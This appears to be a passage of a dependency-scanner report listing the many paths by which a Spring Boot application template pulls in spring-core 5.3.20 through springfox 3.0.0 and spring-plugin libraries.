  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
